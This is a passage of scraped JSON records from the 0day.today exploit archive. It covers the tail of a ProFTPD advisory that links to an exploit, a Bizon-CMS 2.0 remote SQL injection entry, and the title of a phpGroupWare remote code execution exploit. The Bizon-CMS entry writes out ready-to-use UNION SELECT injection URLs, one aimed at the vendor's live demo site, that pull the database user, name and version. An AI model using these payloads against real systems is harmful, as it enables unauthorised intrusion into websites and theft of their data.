problem.\r\n \r\n \r\n- --- 4. Exploit ---\r\nproftpd/linux:\r\nhttp://cxib.net/stuff/proftpd.gnu.c\r\n \r\n \r\n- --- 5. Greets ---\r\nChristos Zoulas, US-CERT, sp3x, Infospec\r\n \r\n \r\n- --- 6. Contact ---\r\nAuthor: SecurityReason.com [ Maksymilian Arciemowicz ]\r\n \r\nEmail:\r\n- - cxib {a\\./t] securityreason [d=t} com\r\n \r\nGPG:\r\n- - http://securityreason.com/key/Arciemowicz.Maksymilian.gpg\r\n \r\nhttp://securityreason.com/\r\nhttp://cxib.net/\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.10 (GNU/Linux)\r\n \r\niQIcBAEBAgAGBQJNJk7rAAoJEIO8+dzW5bUwQ/YP/1G4nXltaUdMrdoUu39DM+WJ\r\nc3f+klSObS/1cDmzBOUte8ddiDdAVbU5yUvjkXkjWwMmxyPregxQxF85iUQ19UIP\r\nPekvo5iuI2Uh5hpWQiTxxHiTqEsGeP9XzKz9uLxQPijicD6vjovg8MkS9xEdg6ID\r\nQ1KW+7tlWY7xgGXTqZux9Y4CsMXqIaWhZlIPJjXDIEipe6HzsKZ0UmRPGEuJGSOh\r\n0tX8Om6PenFk8XOQSp20HMbK/W2qpc1hPAJ3/mrFO+uPF+8scpw413uhjwiSXOUj\r\nHUWE/iioFHRuX9eb2mwDuPKNe32OgLPRpcz1nITQVrOXTyfnwUtPrQeRu6h8Dpv7\r\nRGQtD2GdKknDpkfbUcw0/EHMSbWaJdOWZfFdDAl+rEhS8AwPNK2NJb+7LJ6AQmsM\r\nVCrJPP5eM1XM9jsQT9tvhyOunvw/HMoH/k+GP34p+FiKDIYI1LF3Gxj/w53gUK3F\r\nnYLzmoahnqC4WdfUfZizf24PXmH+385JoStrpC4Emn1kuFrM9i/eXQ3xI9My0OXJ\r\nPFHmVCFx/4iXSi/YNcShZellwi60kFe2OvfJ8BYtG15H+xr0djznLhMqbr2YMisJ\r\n066WWpfe1hTTJezLjbM8Sa9NnufXnEV+jWUocQ+dsSa2Tecn8DrsGor0Yd6UR6in\r\ns6+OIVFddtIZrQ6dw+Kk\r\n=kcIG\r\n-----END PGP SIGNATURE-----\r\n\r\n\n\n# 0day.today [2018-03-01] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/15419"}, {"lastseen": "2018-02-06T03:18:13", "references": [], "description": "Exploit for unknown platform in category web applications", "edition": 2, "reporter": "Mr.SQL", "published": "2008-06-17T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "type": "zdt", "title": "Bizon-CMS 2.0 (index.php Id) Remote SQL Injection Vulnerability", "bulletinFamily": "exploit", "cvelist": [], "modified": "2008-06-17T00:00:00", "id": "1337DAY-ID-3199", "href": "https://0day.today/exploit/description/3199", "sourceData": "===============================================================\r\nBizon-CMS 2.0 (index.php Id) Remote SQL Injection Vulnerability\r\n===============================================================\r\n\r\n\r\n\r\n\r\n#########################################################################\r\n#################### Viva IslaM Viva IslaM ##############################\r\n##\r\n## Remote SQL Injection Vulnerability\r\n##\r\n## Bizon-CMS V2.0 ( index.php Page )\r\n##\r\n#########################################################################\r\n########################\r\n########################\r\n##\r\n## Script : Bizon-CMS\r\n##\r\n## version : V2.0\r\n##\r\n## site : www.bizon-soft.com\r\n##\r\n########################\r\n########################\r\n##\r\n## -(:: SQL ::)-\r\n##\r\n## www.site.com/photo/\r\n## index.php?Page=ShowPicture&Id=-756+union+select+1,2,3,4,5,6,concat_ws(0x3a,user(),database(),version()),8,9,10+from+admins/*\r\n##\r\n## -(:: L!VE DEMO ::)-\r\n##\r\n## http://www.bizon-soft.com/bizon-cms-demo/photo/index.php?Page=ShowPicture&Id=-756+union+select+1,2,3,4,5,6,@@version,current_user,database(),10+from+admins/*\r\n##\r\n#######################\r\n#######################\r\n\r\n######################################################################################################\r\n######################################################################################################\r\n -(:: !Gr3E3E3E3E3E3E3TzZ! ::)-\r\n :: HaCkEr-EGy :: His0k4 :: Dark MaSTer :: MoHaMeD el 3rab :: ALwHeD :: HeBarieH :: MusliMs HaCkErs ::\r\n######################################################################################################\r\n######################################################################################################\r\n\r\n\r\n\n# 0day.today [2018-02-06] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/3199"}]}}

phpGroupWare &lt;= 0.9.16.010 GLOBALS[] Remote Code Execution Exploit

Description

Exploit for unknown platform in category web applications

phpGroupWare <= 0.9.16.010 GLOBALS[] Remote Code Execution Exploit